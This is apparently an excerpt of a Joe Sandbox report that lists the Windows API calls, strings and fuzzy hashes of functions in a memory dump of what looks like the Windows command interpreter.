                                                                            • String ID: *.*
                                                                            • API String ID: 1291122668-438819550
                                                                            APIs
                                                                            • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00B25997
                                                                              • Part of subcall function 00B0AB7F: iswspace.MSVCRT ref: 00B0AB8D
                                                                              • Part of subcall function 00B0AB7F: wcschr.MSVCRT ref: 00B0AB9E
                                                                            Similarity
                                                                            • API ID: Enumiswspacewcschr
                                                                            • String ID: %s=%s$\Shell\Open\Command
                                                                            • API String ID: 3493821229-3301834661
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: GeToken: (%x) '%s'$Ungetting: '%s'
                                                                            • API String ID: 0-1704545398
                                                                            • Opcode ID: 555e858511d41d43974dc2e392c178744381b73e1c68fca5b3f36b43f4854e3d
                                                                            • Instruction ID: 22deda653eefbe88615aaf95c1dd2e79ad644389954de3d6a76993473766a70b
                                                                            • Opcode Fuzzy Hash: 555e858511d41d43974dc2e392c178744381b73e1c68fca5b3f36b43f4854e3d
                                                                            • Instruction Fuzzy Hash: 5F515832A0010196DB20BB64D85977A7FE2FB50354F6587F9E9068B2E1EFB1DD80C791
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: iswdigit$wcstol
                                                                            • String ID: aApP
                                                                            • API String ID: 644763121-2547155087
                                                                            • Opcode ID: a862853ce4744f3bff5955e3df240336f66e0237394142d3fc797b2865ca6a88
                                                                            • Instruction ID: b8c82e0f1fada49cc099c993fb9135087250b4fbba313a55480ebfd80187254e
                                                                            • Opcode Fuzzy Hash: a862853ce4744f3bff5955e3df240336f66e0237394142d3fc797b2865ca6a88
                                                                            • Instruction Fuzzy Hash: 6641F73560023286DF28AF68E49117FB3F5FF9530071648AAE90EDBA84EB30DD42C761
                                                                            APIs
                                                                            • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00B257F8
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00B25886
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: EnumErrorLast
                                                                            • String ID: %s=%s$.
                                                                            • API String ID: 1967352920-4275322459
                                                                            • Opcode ID: 7f6fe4b755f279608f5418098124ccabc0b5e8550f5ad954a30a50b89e2cd4ca
                                                                            • Instruction ID: 84e895daa6c0fd7eb7574b63df068f6c36a7ff93aa644a5fdc2aebc3318eed5c
                                                                            • Opcode Fuzzy Hash: 7f6fe4b755f279608f5418098124ccabc0b5e8550f5ad954a30a50b89e2cd4ca
                                                                            • Instruction Fuzzy Hash: 9A415B71E4063997CF34AB259C95ABF77E9EF94310F1441EDE80E9B281DEB04E81CA90
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B2A79F
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • GetDiskFreeSpaceExW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,-00000105,?,?,?), ref: 00B2A83C
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?), ref: 00B2A8B5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset$DiskFreeSpace
                                                                            • String ID: %5lu
                                                                            • API String ID: 2448137811-2100233843
                                                                            • Opcode ID: 4cf12d175c9e9428798da446e5efaee4205af203b994020c4e11b60b49592776
                                                                            • Instruction ID: 146fc36617fb169323a4d1e6bff5bf1356fdfc43d4001188d42227a0a9672e5d
                                                                            • Opcode Fuzzy Hash: 4cf12d175c9e9428798da446e5efaee4205af203b994020c4e11b60b49592776
                                                                            • Instruction Fuzzy Hash: C5418671A00229ABDB14DBA4ECD5AEEBBF4EF08304F0444E9E509A7181EB749F85CB51
                                                                            APIs
                                                                            • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,?), ref: 00B23835
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B23847
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastOpenSemaphore
                                                                            • String ID: _p0$wil
                                                                            • API String ID: 1909229842-1814513734
                                                                            • Opcode ID: a971874e55001c4d3be00c282b26ee1fb3fe56211919f8349d65f8a99196d2ff
                                                                            • Instruction ID: 3ac3360964e1e65d6f106c33f14399b9292ca802d6024670213a1062ba774e87
                                                                            • Opcode Fuzzy Hash: a971874e55001c4d3be00c282b26ee1fb3fe56211919f8349d65f8a99196d2ff
                                                                            • Instruction Fuzzy Hash: 6D41C3B1A412398BCB25DF28D8985A977F5EB94B00F1482E9E809DF254DB74CF458B90
                                                                            APIs
                                                                            • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000040), ref: 00B2239F
                                                                            • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,?,00000000,001F0001), ref: 00B223CD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: CreateCurrentMutexProcess
                                                                            • String ID: Local\SM0:%d:%d:%hs$wil
                                                                            • API String ID: 3937467467-2303653343
                                                                            • Opcode ID: f45af854eefec278df340ebfeac3dab5f1a4c11b2c8b26583db0b40f798e8857
                                                                            • Instruction ID: 54e24761b04f53b25f23ee8abdfbf906a10c2d680fe1f17db2fc2c297add38dd
                                                                            • Opcode Fuzzy Hash: f45af854eefec278df340ebfeac3dab5f1a4c11b2c8b26583db0b40f798e8857
                                                                            • Instruction Fuzzy Hash: 0441B376A40238ABCB21EB54EC89AEA77F5EF94700F1041C5E91DAB341DB709F458F91
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B2B25E
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • _wcslwr.MSVCRT ref: 00B2B2D2
                                                                            • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,?,?,?), ref: 00B2B30B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_wcslwr
                                                                            • String ID: [%s]
                                                                            • API String ID: 886762496-302437576
                                                                            • Opcode ID: 7eabc308c5f1bbf0b7ad3f1343a1bbc8ad056a9871183d8822916c4a9d3ac861
                                                                            • Instruction ID: be48cdc2f9825967c8daff74acd26bbedf4fab6566adea96c5b563f2515ffa12
                                                                            • Opcode Fuzzy Hash: 7eabc308c5f1bbf0b7ad3f1343a1bbc8ad056a9871183d8822916c4a9d3ac861
                                                                            • Instruction Fuzzy Hash: 57318471A002299BDB14DBA9E885BEEBBF8EB18310F0400E9A509E7181DF74DE448B50
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsnicmp
                                                                            • String ID: /-Y$COPYCMD
                                                                            • API String ID: 1886669725-617350906
                                                                            • Opcode ID: dd2b30959a18be3d8d560950b34761d17a331d70ac367f66e7855a362e1756c4
                                                                            • Instruction ID: 07cb04db7e2595cc4e40fa891d242298d696027aaffff607f133145f774f6adb
                                                                            • Opcode Fuzzy Hash: dd2b30959a18be3d8d560950b34761d17a331d70ac367f66e7855a362e1756c4
                                                                            • Instruction Fuzzy Hash: C6215E75A04221ABCF289B199C897FBB6E5EF89358B9100E5E849E7340EB70CE81C350
                                                                            APIs
                                                                              • Part of subcall function 00B09E8E: iswspace.MSVCRT ref: 00B09E9E
                                                                            • iswspace.MSVCRT ref: 00B09E28
                                                                            • _wcsnicmp.MSVCRT ref: 00B09E79
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: iswspace$_wcsnicmp
                                                                            • String ID: off
                                                                            • API String ID: 3989682491-733764931
                                                                            • Opcode ID: cabad05293ca8bee3b97b3c6d7153e767b1d229e4f0f7f5f9a8e35503a755482
                                                                            • Instruction ID: d5c530a00754a7fee55264daa42d01ba20d1ff5d44bb10643f86354de7562764
                                                                            • Opcode Fuzzy Hash: cabad05293ca8bee3b97b3c6d7153e767b1d229e4f0f7f5f9a8e35503a755482
                                                                            • Instruction Fuzzy Hash: A31148266043119ADA28A269EC5AB3B5ED4DB81B51B2400EDF90AD30C3EE018E4980A1
                                                                            APIs
                                                                              • Part of subcall function 00B1727B: __iob_func.MSVCRT ref: 00B17280
                                                                            • fprintf.MSVCRT ref: 00B25182
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: __iob_funcfprintf
                                                                            • String ID: CMD Internal Error %s$%s$Null environment
                                                                            • API String ID: 620453056-2781220306
                                                                            • Opcode ID: 692a753345d7d9886d9afff0e3d59e2ae0cf82e7cb68e62cbf57b91504054bf5
                                                                            • Instruction ID: af96613393b9b80d49a44139e18fecc0ae3181dc93b3caea8aa8f8ed3dbc6960
                                                                            • Opcode Fuzzy Hash: 692a753345d7d9886d9afff0e3d59e2ae0cf82e7cb68e62cbf57b91504054bf5
                                                                            • Instruction Fuzzy Hash: D3017B37A44A225AC7342B58B84AAA373D4EAE071632505ABEC5EB3180F9709E52C540
                                                                            APIs
                                                                            • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll.dll), ref: 00B2351B
                                                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RtlDllShutdownInProgress), ref: 00B2352C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: RtlDllShutdownInProgress$ntdll.dll
                                                                            • API String ID: 1646373207-582119455
                                                                            • Opcode ID: 58eb3228ed4e371825fee52e4778b9c1ff744f3197a9506852260fe39d87fe68
                                                                            • Instruction ID: 6a65188bdfb352f824fe7162b186d3875e5abc6a336f821bfb86dd6106aad9b9
                                                                            • Opcode Fuzzy Hash: 58eb3228ed4e371825fee52e4778b9c1ff744f3197a9506852260fe39d87fe68
                                                                            • Instruction Fuzzy Hash: 37E01235A512309B8B715F35BD0959E3BE8FB56F6030501D5E90DE3360DE648E018FD1
                                                                            APIs
                                                                            • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernelbase.dll), ref: 00B238FB
                                                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RaiseFailFastException), ref: 00B23907
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: RaiseFailFastException$kernelbase.dll
                                                                            • API String ID: 1646373207-919018592
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B1539E
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,00007FE9), ref: 00B154C6
                                                                              • Part of subcall function 00B08E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00B48BF0,00000000,?), ref: 00B08EC3
                                                                            Similarity
                                                                            • API ID: memset$CurrentDirectory
                                                                            • String ID:
                                                                            • API String ID: 168429351-0
                                                                            APIs
                                                                            Similarity
                                                                            • API ID: _wcsnicmp$wcschr
                                                                            • String ID:
                                                                            • API String ID: 3270668897-0
                                                                            APIs
                                                                            Similarity
                                                                            • API ID: iswdigit
                                                                            • String ID:
                                                                            • API String ID: 3849470556-0
                                                                            APIs
                                                                            • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,00B080F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00B11D3A
                                                                            • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00B080F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00B11D44
                                                                            • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,00B080F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00B11D57
                                                                            • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00B080F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00B11D61
                                                                            Similarity
                                                                            • API ID: ErrorMode$FullNamePath
                                                                            • String ID:
                                                                            • API String ID: 268959451-0
                                                                            APIs
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00B0C5BD
                                                                            • RtlFreeHeap.NTDLL ref: 00B0C5C4
                                                                            • _setjmp3.MSVCRT ref: 00B0C630
                                                                            • VirtualFree.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,00008000,00000000,00000000,00000000,00000000,00000000), ref: 00B0C69D
                                                                            Similarity
                                                                            • API ID: FreeHeap$ProcessVirtual_setjmp3
                                                                            • String ID:
                                                                            • API String ID: 2613391085-0
                                                                            APIs
                                                                            • longjmp.MSVCRT(00B40A30,00000001,?,?,00B1BFD6,?,?,?,?,?,?,?,?), ref: 00B264D4
                                                                              • Part of subcall function 00B0DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000), ref: 00B0DCE1
                                                                              • Part of subcall function 00B0DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000,00000000), ref: 00B0DCE8
                                                                              • Part of subcall function 00B172EF: ApiSetQueryApiSetPresence.API-MS-WIN-CORE-APIQUERY-L1-1-0(00B01028,?,?,?,00B1F12E,00B2CA50,00000018,00B11E7C,00000000,00000000,00B1ACE0,00000000,00000000,?,00000104,?), ref: 00B17314
                                                                            • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00000000,000000FF,00000000,00000000,?,?,00B1BFD6), ref: 00B2646C
                                                                            • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,00000000,000000FF,00000000,00000000,?,?,00B1BFD6), ref: 00B26474
                                                                            • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,00000000,000000FF,00000000,00000000,?,?,00B1BFD6), ref: 00B264B6
                                                                            Similarity
                                                                            • API ID: ErrorHeapMode$AllocByteCharMultiPresenceProcessQueryWidelongjmp
                                                                            • String ID:
                                                                            • API String ID: 129137517-0
                                                                            APIs
                                                                            • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000001,?,00B2CD20,0000001C,00B258DF), ref: 00B262E6
                                                                            • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?,00B2CD20,0000001C,00B258DF), ref: 00B26301
                                                                            • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?), ref: 00B26340
                                                                            • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00B2635D
                                                                            Similarity
                                                                            • API ID: QueryValue$ErrorLastOpen
                                                                            • String ID:
                                                                            • API String ID: 4270309053-0
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B2A034
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00450052,-00000209,00000000,?,-00000209,0020005D,00B0234C,0020005D), ref: 00B2A078
                                                                            • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00B2A0AA
                                                                            • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,0020005D,00B0234C,0020005D), ref: 00B2A0C2
                                                                            Similarity
                                                                            • API ID: memset$DriveFullNamePathType
                                                                            • String ID:
                                                                            • API String ID: 3442494845-0
                                                                            APIs
                                                                            • wcstol.MSVCRT ref: 00B12977
                                                                            • wcstol.MSVCRT ref: 00B12987
                                                                            • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,00B0E559,?,?,00000000,?), ref: 00B129FF
                                                                            • lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,00B0E559,?,?,00000000,?), ref: 00B12A09
                                                                            Similarity
                                                                            • API ID: wcstol$lstrcmplstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 4273384694-0
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B2C56B
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001,-00000001,00000001,00000000,00000000), ref: 00B2C5A5
                                                                            • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00B2C5BD
                                                                            • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,00000001,00000000,00000000), ref: 00B2C5DA
                                                                            Similarity
                                                                            • API ID: memset$DriveNamePathTypeVolume
                                                                            • String ID:
                                                                            • API String ID: 1029679093-0
APIs
• _get_osfhandle.MSVCRT ref: 00B29822
• WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B292EA,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00B2982A
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B29841
• DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00B2986E
Memory Dump Source
• Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
• Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
Similarity
• API ID: File$DeleteErrorLastWrite_get_osfhandle
• String ID:
• API String ID: 2448200120-0
• Opcode ID: a1114dab31d25dce7a04cb6d883a09091a0ebd22836f612b7807f2908ecb728b
• Instruction ID: 973476387bac69f0f736a30fd9df5881cbc57f16d8bb4bb764570f6f8b7e72ca
• Opcode Fuzzy Hash: a1114dab31d25dce7a04cb6d883a09091a0ebd22836f612b7807f2908ecb728b
• Instruction Fuzzy Hash: 66110431200220AFDB159B21FC49A7F7799EB86B65F24416DF80DDB290DE708C008A61
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00B29962,00000000,?,00000000,00B1CF94,00000000,?), ref: 00B0727F
• RtlFreeHeap.NTDLL ref: 00B07286
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 00B072AF
• RtlFreeHeap.NTDLL ref: 00B072B6
Memory Dump Source
• Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
• Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
• Opcode ID: 60d83ab5761eb4a21df853a42f306bee627d72cb0613d251b0f1dde54461edd6
• Instruction ID: f86429c21b96aec6a1a3c3a3cef1fb54f472ff2b5ae2b4c5be8d71a4560e5f2d
• Opcode Fuzzy Hash: 60d83ab5761eb4a21df853a42f306bee627d72cb0613d251b0f1dde54461edd6
• Instruction Fuzzy Hash: 8111E235A492409BDB20AF649845B3ABFE1EF87310F24448CF59ACB2D1CF34E842D761
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00000000,00000000,00B06231,00000000,00000000,F330BDDA), ref: 00B0630C
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00B06313
Memory Dump Source
• Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
• Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
